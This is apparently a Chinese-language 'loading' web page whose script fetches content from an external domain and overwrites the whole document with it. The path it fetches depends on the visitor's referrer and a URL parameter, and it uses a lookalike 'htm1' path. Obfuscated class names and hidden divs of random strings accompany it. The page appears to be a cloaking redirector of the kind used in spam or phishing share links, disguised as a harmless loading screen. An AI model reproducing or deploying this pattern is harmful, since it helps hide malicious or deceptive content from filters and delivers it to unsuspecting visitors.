<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eFq3CjZ5v {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eFq3CjZ5v .jeYQWFlr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eFq3CjZ5v .content {
            line-height: 50px;
            text-align: center
        }

        .eFq3CjZ5v .img {
            width: 100%
        }

        .eFq3CjZ5v .VPp2RtivJ {
            text-align: center
        }

        .eFq3CjZ5v .VPp2RtivJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eFq3CjZ5v .VPp2RtivJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eFq3CjZ5v .VPp2RtivJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eFq3CjZ5v .VPp2RtivJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eFq3CjZ5v .VPp2RtivJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eFq3CjZ5v .VPp2RtivJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eFq3CjZ5v .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fKtEzJJnXV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var J67eC = fKtEzJJnXV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ J67eC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ J67eC +".html?a=share";
		}
		
        cje6pAU=url+"#"+new Date().getTime();
        cje6pAU && function() {
            $.get(cje6pAU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>JnuY8BFUKKw1ch5OPp7DfQYUGf1q5Lcjg82E5TDil9P1RSd4E91SEah5d0COHgijGjrnuzHnjh</p>
<img  src='' style='display:none'>
<div style='display:none'>A8XmiC5YbFN46D9e2ijvPpc12fHXyWE4jK2TKgaEQcAo</div><div class="eFq3CjZ5v">
    <div class="jeYQWFlr">
        <div class="VPp2RtivJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >He5BgG2jy8hsEMivQCOjo4l4rMlEaj3DHpH</b>
<div style='display:none'>wq8lG9GAeSERuiecUYLuEotHcqF0uy7OMFJQ3wvb64lmFCELEcSEpxv3XW46LBxsDfEc</div>
<div style='display:none'>wq8lG9GAeSERuiecUYLuEotHcqF0uy7OMFJQ3wvb64lmFCELEcSEpxv3XW46LBxsDfEc</div>
<div style='display:none'>wq8lG9GAeSERuiecUYLuEotHcqF0uy7OMFJQ3wvb64lmFCELEcSEpxv3XW46LBxsDfEc</div></body>
</html>